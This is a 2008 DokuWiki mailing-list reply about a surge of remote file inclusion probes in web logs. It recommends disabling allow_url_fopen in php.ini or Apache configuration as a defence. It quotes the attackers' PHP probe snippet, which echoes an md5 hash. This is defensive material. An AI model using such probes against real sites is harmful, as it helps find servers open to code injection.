|
[dokuwiki]
||
[Date Prev]
[02-2008 Date Index]
[Date Next]
||
[Thread Prev]
[02-2008 Thread Index]
[Thread Next]
[dokuwiki] Re: attempt to use possible vulnerability of dokuwiki
- From: Jonathan Dill <jonathan@xxxxxxxxx>
- To: dokuwiki@xxxxxxxxxxxxx
- Date: Wed, 06 Feb 2008 18:50:32 -0500
Digging back through web log files, there has been a "surge" in this
type of activity lately where the target is the <?php echo
md5("just_a_test");?> but this type of exploit is nothing new.
Here is a decent recent article from CIAC explaining the issues in basic
terms. These attempts appear to be targeting index.php in general, I
found attempts in the logs of several non-dokuwiki sites as well. The
issue is not with dokuwiki, but how you have configured PHP and your web
server, hopefully allow_url_fopen = 'off' and you do not have anything
that requires that capability or try to use cURL instead. Newer PHP
uses a "wrapper" which can be used to restrict what can be included.
http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml
Docs from PHP website:
http://us2.php.net/filesystem
See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html
Recommendations
You should disable allow_url_fopen in the php.ini file:
; Disable allow_url_fopen for security reasons
allow_url_fopen = 'off'
The setting can also be disabled in apache's httpd.conf file:
# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off
For remote file access, consider using the cURL functions that PHP
provides.
Jonathan
--
DokuWiki mailing list - more info at
http://wiki.splitbrain.org/wiki:mailinglist
|
|
